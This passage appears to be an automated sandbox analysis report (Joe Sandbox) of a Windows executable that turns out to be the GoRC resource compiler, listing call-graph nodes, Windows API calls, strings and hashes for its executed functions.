4045a0 22 API calls 6556->6559 6688 404cd9 6556->6688 6558->6165 6558->6166 6558->6179 6559->6556 6561 40632e 6560->6561 6562 403f33 VirtualAlloc 6561->6562 6563 4063e2 6561->6563 6562->6563 6563->6178 6565 407b32 6564->6565 6566 406c70 24 API calls 6565->6566 6567 407b4b 6565->6567 6568 407b3b 6565->6568 6566->6565 6567->6178 6569 404448 22 API calls 6568->6569 6569->6567 6571 404ed3 VirtualAlloc 6570->6571 6572 405a9e 6571->6572 6573 405a97 6572->6573 6694 4055b4 6572->6694 6573->6178 6576 4045a0 22 API calls 6577 405aac 6576->6577 6578 404691 22 API calls 6577->6578 6579 405abb 6578->6579 6579->6573 6580 4045a0 22 API calls 6579->6580 6581 405ace 6580->6581 6581->6573 6582 4059a3 24 API calls 6581->6582 6583 405ade 6582->6583 6583->6573 6584 4045a0 22 API calls 6583->6584 6585 405b03 6584->6585 6586 40579e 22 API calls 6585->6586 6594 405b7d 6585->6594 6587 405b1d 6586->6587 6588 4045a0 22 API calls 6587->6588 6587->6594 6589 405b4f 6588->6589 6590 404dc6 22 API calls 6589->6590 6589->6594 6591 405b5f 6590->6591 6592 4045a0 22 API calls 6591->6592 6591->6594 6593 405b66 6592->6593 6593->6594 6595 40579e 22 API calls 6593->6595 6594->6178 6595->6594 6597 404ed3 VirtualAlloc 6596->6597 6598 405b8a 6597->6598 6599 405b83 6598->6599 6600 4055b4 23 API calls 6598->6600 6599->6178 6601 405b91 6600->6601 6601->6599 6602 4045a0 22 API calls 6601->6602 6603 405b98 6602->6603 6604 404691 22 API calls 6603->6604 6605 405bae 6604->6605 6605->6599 6606 4045a0 22 API calls 6605->6606 6607 405bc0 6606->6607 6607->6599 6608 4059a3 24 API calls 6607->6608 6609 405bd0 6608->6609 6609->6599 6610 4045a0 22 API calls 6609->6610 6611 405bf5 6610->6611 6611->6599 6612 40579e 22 API calls 6611->6612 6613 405c12 6612->6613 6614 405c91 6613->6614 6615 4045a0 22 API calls 6613->6615 6614->6178 6616 405c45 6615->6616 6616->6614 6617 404dc6 22 API calls 6616->6617 6618 405c55 6617->6618 6618->6614 6619 4045a0 22 API calls 6618->6619 6620 405c5c 6619->6620 6621 405c8f 6620->6621 6622 40579e 22 API calls 6620->6622 6621->6178 6623 405c73 6622->6623 6623->6614 6624 4045a0 22 API calls 6623->6624 6625 405c7a 6624->6625 6625->6621 6626 405892 22 API calls 6625->6626 6627 405c87 6626->6627 6627->6614 6628 4058fd 22 API calls 6627->6628 6629 405c8e 6628->6629 6629->6178 6631 404ed3 VirtualAlloc 6630->6631 6632 405c98 6631->6632 6633 405cc1 6632->6633 6634 405cb9 6632->6634 6638 405cc0 6632->6638 6635 405523 23 API calls 6633->6635 6699 40554f 6634->6699 6637 405cbe 6635->6637 6637->6638 6639 405ce5 6637->6639 6640 4045a0 22 API calls 6637->6640 6638->6178 6641 404691 22 API calls 6639->6641 6640->6639 6642 405cf4 6641->6642 6643 4045a0 22 API calls 6642->6643 6654 405d50 6642->6654 6644 405d07 6643->6644 6645 404dc6 22 API calls 6644->6645 6644->6654 6646 405d17 6645->6646 6647 4045a0 22 API calls 6646->6647 6646->6654 6648 405d1e 6647->6648 6649 40579e 22 API calls 6648->6649 6648->6654 6650 405d32 6649->6650 6651 4045a0 22 API calls 6650->6651 6650->6654 6652 405d39 6651->6652 6653 40579e 22 API calls 6652->6653 6652->6654 6653->6654 6654->6178 6656 404ed3 VirtualAlloc 6655->6656 6657 405d5b 6656->6657 6658 405d96 6657->6658 6659 405d8e 6657->6659 6663 405d95 6657->6663 6661 405523 23 API calls 6658->6661 6660 40554f 23 API calls 6659->6660 6662 405d93 6660->6662 6661->6662 6662->6663 6664 405dba 6662->6664 6665 4045a0 22 API calls 6662->6665 6663->6178 6666 404691 22 API calls 6664->6666 6665->6664 6667 405dd0 6666->6667 6667->6663 6668 4045a0 22 API calls 6667->6668 6669 405de2 6668->6669 6670 405e4c 6669->6670 6671 404dc6 22 API calls 6669->6671 6670->6178 6672 405df2 6671->6672 6672->6670 6673 4045a0 22 API calls 6672->6673 6674 405df9 6673->6674 6675 405e4a 6674->6675 6676 40579e 22 API calls 6674->6676 6675->6178 6677 405e10 6676->6677 6677->6670 6678 4045a0 22 API calls 6677->6678 6679 405e17 6678->6679 6679->6675 6680 40579e 22 API calls 6679->6680 6681 405e2e 6680->6681 6681->6670 6682 4045a0 22 API calls 6681->6682 6683 405e35 6682->6683 6683->6675 6684 405892 22 API calls 6683->6684 6685 405e42 6684->6685 6685->6670 6686 4058fd 22 API calls 6685->6686 6687 405e49 6686->6687 6687->6178 6693 404cf9 6688->6693 6689 403c0b 22 API calls 6689->6693 6690 404d8d 6690->6556 6691 403b47 22 API calls 6691->6693 6692 404448 22 API calls 6692->6693 6693->6689 6693->6690 6693->6691 6693->6692 6695 4053ed 23 API calls 6694->6695 6697 4055d1 6695->6697 6696 4055f2 6696->6573 6696->6576 6697->6696 6698 404691 22 API calls 6697->6698 6698->6696 6700 4053ed 23 API calls 6699->6700 6701 405566 6700->6701 6702 405587 6701->6702 6703 404691 22 API calls 6701->6703 6702->6637 6703->6702 6707 406ece 6704->6707 6705 404448 22 API calls 6705->6707 6706 406ed7 6710 4045a0 22 API calls 6706->6710 6716 406f0c 6706->6716 6707->6705 6707->6706 6708 406f20 6707->6708 6711 403b47 22 API calls 6707->6711 6707->6716 6709 403c0b 22 API calls 6708->6709 6709->6706 6712 406f74 6710->6712 6711->6707 6713 404691 22 API calls 6712->6713 6712->6716 6717 406f85 6713->6717 6714 4045a0 22 API calls 6714->6717 6715 404448 22 API calls 6715->6717 6716->6190 6717->6714 6717->6715 6717->6716 6719 4071ec 6718->6719 6720 4071cd 6718->6720 6721 4071de 6719->6721 6723 4071f4 6719->6723 6724 40720e 6719->6724 6765 407166 6720->6765 6721->6196 6725 407166 22 API calls 6723->6725 6726 407212 6724->6726 6727 407238 6724->6727 6725->6721 6730 404448 22 API calls 6726->6730 6728 407254 6727->6728 6729 40723c 6727->6729 6732 407271 6728->6732 6733 407258 6728->6733 6731 407166 22 API calls 6729->6731 6734 407217 6730->6734 6731->6721 6736 407283 6732->6736 6737 407293 6732->6737 6738 407279 6732->6738 6778 407045 6733->6778 6734->6721 6772 4070ab 6734->6772 6736->6196 6737->6736 6741 407045 22 API calls 6737->6741 6739 407166 22 API calls 6738->6739 6739->6736 6741->6736 6743 404ed3 VirtualAlloc 6742->6743 6744 407343 6743->6744 6745 4053ed 23 API calls 6744->6745 6759 407380 6744->6759 6746 407359 6745->6746 6747 4045a0 22 API calls 6746->6747 6746->6759 6750 407365 6747->6750 6748 404448 22 API calls 6748->6750 6750->6748 6751 403b47 22 API calls 6750->6751 6755 40738f 6750->6755 6756 40738d 6750->6756 6758 40739a 6750->6758 6750->6759 6751->6750 6752 405401 22 API calls 6752->6755 6753 4073fe 6753->6202 6754 4045a0 22 API calls 6754->6755 6755->6752 6755->6754 6757 404448 22 API calls 6755->6757 6755->6759 6756->6755 6756->6758 6757->6755 6758->6759 6793 4052b7 6758->6793 6759->6202 6761 4053ed 23 API calls 6760->6761 6762 407309 6761->6762 6763 404448 22 API calls 6762->6763 6764 407321 6762->6764 6763->6764 6764->6202 6767 40716c 6765->6767 6766 404448 22 API calls 6766->6767 6767->6766 6768 40717e 6767->6768 6770 403b47 22 API calls 6767->6770 6771 407183 6767->6771 6769 403c0b 22 API calls 6768->6769 6769->6771 6770->6767 6771->6721 6775 4070ca 6772->6775 6773 40713c 6773->6721 6774 403c0b 22 API calls 6774->6775 6775->6773 6775->6774 6776 403b47 22 API calls 6775->6776 6777 404448 22 API calls 6775->6777 6776->6775 6777->6775 6779 4054a8 22 API calls 6778->6779 6780 407053 6779->6780 6781 40709d 6780->6781 6782 4045a0 22 API calls 6780->6782 6781->6721 6783 40705a 6782->6783 6783->6781 6784 4054a8 22 API calls 6783->6784 6785 407067 6784->6785 6785->6781 6786 4045a0 22 API calls 6785->6786 6787 407077 6786->6787 6787->6781 6788 4054a8 22 API calls 6787->6788 6789 407087 6788->6789 6789->6781 6790 4045a0 22 API calls 6789->6790 6791 407090 6790->6791 6791->6781 6792 4054a8 22 API calls 6791->6792 6792->6781 6794 4051f8 2 API calls 6793->6794 6795 4052c1 6794->6795 6795->6753 6800 406617 6796->6800 6798 4066bd 6798->6063 6798->6064 6799 404e50 VirtualAlloc 6799->6800 6800->6798 6800->6799 6802 406559 6800->6802 6808 4065ce 6800->6808 6803 404e50 VirtualAlloc 6802->6803 6804 40659f 6803->6804 6805 4065cb 6804->6805 6806 4069a3 CharUpperW 6804->6806 6805->6800 6807 4065c0 6806->6807 6807->6800 6809 404e50 VirtualAlloc 6808->6809 6810 4065e1 6809->6810 6811 4051f8 2 API calls 6810->6811 6812 4065f4 6810->6812 6811->6812 6812->6800 6814 40125b 6813->6814 6816 4011f5 6813->6816 6814->5547 6815 4010b0 4 API calls 6815->6814 6816->6815 6818 4021bc 6817->6818 6819 4021ca 6818->6819 6846 401ee5 6818->6846 6819->5695 6822 40229f 6821->6822 6823 401ee5 3 API calls 6822->6823 6824 4022b2 6822->6824 6823->6822 6824->5707 6828 4022c7 6825->6828 6826 4022d5 6826->5709 6827 401ee5 3 API calls 6827->6828 6828->6826 6828->6827 6830 401624 6829->6830 6831 401671 6830->6831 6832 401bdb WideCharToMultiByte 6830->6832 6833 401695 CreateFileA 6831->6833 6834 40168d CreateFileW 6831->6834 6832->6831 6835 40169a 6833->6835 6834->6835 6836 4016a1 SetFilePointer WriteFile WriteFile SetEndOfFile CloseHandle 6835->6836 6837 40169f 6835->6837 6838 4011ec 4 API calls 6836->6838 6837->5700 6839 401703 6838->6839 6839->5700 6841 402105 6840->6841 6853 401fe4 6841->6853 6843 40211e 6844 401fe4 WideCharToMultiByte 6843->6844 6845 402134 6844->6845 6845->5708 6847 401eef 6846->6847 6851 401f02 6846->6851 6848 401f09 WideCharToMultiByte WideCharToMultiByte 6847->6848 6847->6851 6852 401e0f 6848->6852 6850 401f58 CompareStringA 6850->6851 6851->6818 6852->6850 6854 402057 WideCharToMultiByte 6853->6854 6855 401feb 6853->6855 6854->6855 6855->6843 6856 4019a4 6859 401000 6856->6859 6860 401005 WriteFile 6859->6860 6861 4028b5 6862 4028eb 6861->6862 6863 4010b0 4 API calls 6862->6863 6864 40290c 6863->6864

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                Function 00402981 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetVersionExA.KERNEL32(Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,00402A4B,000000F5,004028B5), ref: 0040298D
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(Kernel32.dll,Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,00402A4B,000000F5,004028B5), ref: 0040299D
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WriteConsoleW), ref: 004029AA
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 004029BE
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateFileMappingW), ref: 004029D2
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 004029E6
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CompareStringW), ref: 004029FA
                                                                                                                                                                                                • LoadLibraryA.KERNEL32(User32.dll,00000000,CompareStringW,00000000,DeleteFileW,00000000,CreateFileMappingW,00000000,CreateFileW,Kernel32.dll,Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,00402A4B,000000F5,004028B5), ref: 00402A0D
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CharUpperW), ref: 00402A1A
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw, xrefs: 00402981, 0040298C
                                                                                                                                                                                                • User32.dll, xrefs: 00402A08
                                                                                                                                                                                                • CharUpperW, xrefs: 00402A14
                                                                                                                                                                                                • Kernel32.dll, xrefs: 00402998
                                                                                                                                                                                                • WriteConsoleW, xrefs: 004029A4
                                                                                                                                                                                                • CreateFileMappingW, xrefs: 004029CC
                                                                                                                                                                                                • CreateFileW, xrefs: 004029B8
                                                                                                                                                                                                • CompareStringW, xrefs: 004029F4
                                                                                                                                                                                                • DeleteFileW, xrefs: 004029E0
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.2465623051.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000007.00000002.2465602745.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465644219.0000000000409000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465663352.000000000040B000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.000000000040E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.0000000000410000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465724478.0000000000411000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465745159.0000000000413000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_XpAg0vN.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$HandleLibraryLoadModuleVersion
                                                                                                                                                                                                • String ID: CharUpperW$CompareStringW$CreateFileMappingW$CreateFileW$DeleteFileW$Kernel32.dll$Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw$User32.dll$WriteConsoleW
                                                                                                                                                                                                • API String ID: 1146215182-233245901
                                                                                                                                                                                                • Opcode ID: ced4b202cc55584c467a3d75c948af35bcf69c12da2893e5a14bb1fe67c241d8
                                                                                                                                                                                                • Instruction ID: 1c3bffd0a120bafb38a3afad8643a152f63fb1648ba46c0d32e68fac2025fcf1
                                                                                                                                                                                                • Opcode Fuzzy Hash: ced4b202cc55584c467a3d75c948af35bcf69c12da2893e5a14bb1fe67c241d8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 41019E70B513016AC321BF721F029BA2DE09646749354043FB484F12DADAFC8D85CF6E
                                                                                                                                                                                                Function 00402A30 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 88COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(004028B5), ref: 00402A35
                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F5,004028B5), ref: 00402A3C
                                                                                                                                                                                                  • Part of subcall function 00402981: GetVersionExA.KERNEL32(Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,00402A4B,000000F5,004028B5), ref: 0040298D
                                                                                                                                                                                                  • Part of subcall function 00402981: GetModuleHandleA.KERNEL32(Kernel32.dll,Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,00402A4B,000000F5,004028B5), ref: 0040299D
                                                                                                                                                                                                  • Part of subcall function 00402981: GetProcAddress.KERNEL32(00000000,WriteConsoleW), ref: 004029AA
                                                                                                                                                                                                  • Part of subcall function 00402981: GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 004029BE
                                                                                                                                                                                                  • Part of subcall function 00402981: GetProcAddress.KERNEL32(00000000,CreateFileMappingW), ref: 004029D2
                                                                                                                                                                                                  • Part of subcall function 00402981: GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 004029E6
                                                                                                                                                                                                  • Part of subcall function 00402981: GetProcAddress.KERNEL32(00000000,CompareStringW), ref: 004029FA
                                                                                                                                                                                                  • Part of subcall function 00402981: LoadLibraryA.KERNEL32(User32.dll,00000000,CompareStringW,00000000,DeleteFileW,00000000,CreateFileMappingW,00000000,CreateFileW,Kernel32.dll,Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,00402A4B,000000F5,004028B5), ref: 00402A0D
                                                                                                                                                                                                  • Part of subcall function 00402981: GetProcAddress.KERNEL32(00000000,CharUpperW), ref: 00402A1A
                                                                                                                                                                                                • Beep.KERNEL32(000003E8,000000FA), ref: 00402B74
                                                                                                                                                                                                • ExitProcess.KERNEL32(00000000,000000F5,004028B5), ref: 00402BA5
                                                                                                                                                                                                  • Part of subcall function 004019D3: GetCommandLineW.KERNEL32(00402A57,000000F5,004028B5), ref: 004019E1
                                                                                                                                                                                                  • Part of subcall function 004019D3: lstrlenW.KERNEL32(00000000,00402A57,000000F5,004028B5), ref: 004019E9
                                                                                                                                                                                                  • Part of subcall function 00401C3E: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00402B03,000000F5,004028B5), ref: 00401C76
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.2465623051.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000007.00000002.2465602745.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465644219.0000000000409000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465663352.000000000040B000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.000000000040E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.0000000000410000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465724478.0000000000411000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465745159.0000000000413000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_XpAg0vN.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$Handle$BeepCommandCreateExceptionExitFileFilterLibraryLineLoadModuleProcessUnhandledVersionlstrlen
                                                                                                                                                                                                • String ID: Could not open source file ($OBJ file not made$RES file not made$The system could not make the RES output file
                                                                                                                                                                                                • API String ID: 3362375527-3387250029
                                                                                                                                                                                                • Opcode ID: 061d8fe84f7ed475d0936e17147aff47d8e97e91f904e7c186020ce4161d1b15
                                                                                                                                                                                                • Instruction ID: e726e8376b3f60f22f8352dd9ec7017af997bad18b529355082bc11a36f75c37
                                                                                                                                                                                                • Opcode Fuzzy Hash: 061d8fe84f7ed475d0936e17147aff47d8e97e91f904e7c186020ce4161d1b15
                                                                                                                                                                                                • Instruction Fuzzy Hash: DA314910A0869240EA297FF35B0F71A6A950F1932DF18417F7E42351E38EFC5D42966F
                                                                                                                                                                                                Function 004010B0 Relevance: 4.5, APIs: 3, Instructions: 35fileCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 105 4010b0-4010bd 106 401110-401117 105->106 107 4010bf-4010da 105->107 110 401119-40112a call 40108d 106->110 111 40112e-401133 WriteFile 106->111 108 4010e3-4010fa call 40108d WriteConsoleW 107->108 109 4010dc-4010e1 WriteConsoleA 107->109 113 401100-401102 108->113 109->113 110->111 112 401138-40113e 111->112 117 401104-401109 call 401057 113->117 118 401135 113->118 117->106 118->112
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • WriteConsoleA.KERNEL32(?,?,?,?,?,004011BA,Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,00409000,00000000,00403E0C,00000000,00100000,00002000,00000004,00403E18), ref: 004010DC
                                                                                                                                                                                                • WriteConsoleW.KERNELBASE(?,?,?,?,?,004011BA,Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,00409000,00000000,00403E0C,00000000,00100000,00002000,00000004,00403E18), ref: 004010FA
                                                                                                                                                                                                • WriteFile.KERNEL32(004011BA,Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,Use this syntax in the command line:-GoRC [command line switches] inputfile[.ext]If the [.ext] is .RC, then by default both RES and OBJ files are createdOverride by using the /o or /r switch or by specifying an output file with /foCommand line sw,00409000,00000000,00403E0C,00000000,00100000,00002000,00000004,00403E18,00402A50,000000F5,004028B5), ref: 0040112E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.2465623051.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000007.00000002.2465602745.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465644219.0000000000409000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465663352.000000000040B000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.000000000040E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.0000000000410000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465724478.0000000000411000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465745159.0000000000413000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_XpAg0vN.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Write$Console$File
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 397230816-0
                                                                                                                                                                                                • Opcode ID: 402cdfcdc4c4f22c3d9e241e989690fcd6e94ce12a5ec1c759d640e787f5307e
                                                                                                                                                                                                • Instruction ID: 35c16651b3d7f306d0f74b58dfc7599226eb7134ca4fa369b445fd06365963bb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 402cdfcdc4c4f22c3d9e241e989690fcd6e94ce12a5ec1c759d640e787f5307e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FF0FBB05083819BD7159F21DB4521A7ED06B89758F05887EEBC8362F2D73C5890965F
                                                                                                                                                                                                Function 00403DD8 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 19memoryCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 122 403dd8-403de9 VirtualAlloc 123 403e02-403e0d call 40113f 122->123 124 403deb-403dff VirtualAlloc 122->124 124->123 126 403e01 124->126
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,00403E18,00402A50,000000F5,004028B5), ref: 00403DE2
                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004,00000000,00100000,00002000,00000004,00403E18,00402A50,000000F5,004028B5), ref: 00403DF8
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Insufficient memory for the task, xrefs: 00403E02
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.2465623051.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000007.00000002.2465602745.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465644219.0000000000409000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465663352.000000000040B000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.000000000040E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.0000000000410000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465724478.0000000000411000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465745159.0000000000413000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_XpAg0vN.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                • String ID: Insufficient memory for the task
                                                                                                                                                                                                • API String ID: 4275171209-2746834084
                                                                                                                                                                                                • Opcode ID: 7a7a424a8a21d6a93707dfda6c7883a7003a0816a5618f823cffb553bad56e97
                                                                                                                                                                                                • Instruction ID: 69b2e8ad3495f93a616a634fd673286c881fe0861425312e059062586f7d7ed3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7a424a8a21d6a93707dfda6c7883a7003a0816a5618f823cffb553bad56e97
                                                                                                                                                                                                • Instruction Fuzzy Hash: 18D0C97079430130F9302A624D0BF5A0C890748F9AF6448763344BD5CBD8FC9A8180AE
                                                                                                                                                                                                Function 00403E80 Relevance: 2.5, APIs: 2, Instructions: 10COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 128 403e80 129 403e82-403e9a VirtualFree * 2 128->129 130 403e9f 128->130 129->130
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00100000,00004000,00000000,00000000,00008000,00403EAB,00402B48,000000F5,004028B5), ref: 00403E95
                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00100000,00004000,00000000,00000000,00008000,00403EAB,00402B48,000000F5,004028B5), ref: 00403E9A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000007.00000002.2465623051.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000007.00000002.2465602745.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465644219.0000000000409000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465663352.000000000040B000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.000000000040E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465683538.0000000000410000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465724478.0000000000411000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000007.00000002.2465745159.0000000000413000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_XpAg0vN.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FreeVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                                                                                • Opcode ID: 56aa49c43a02b4d8b323e285e173ed64c4dfb729c781d691af90392fedcd1c3d
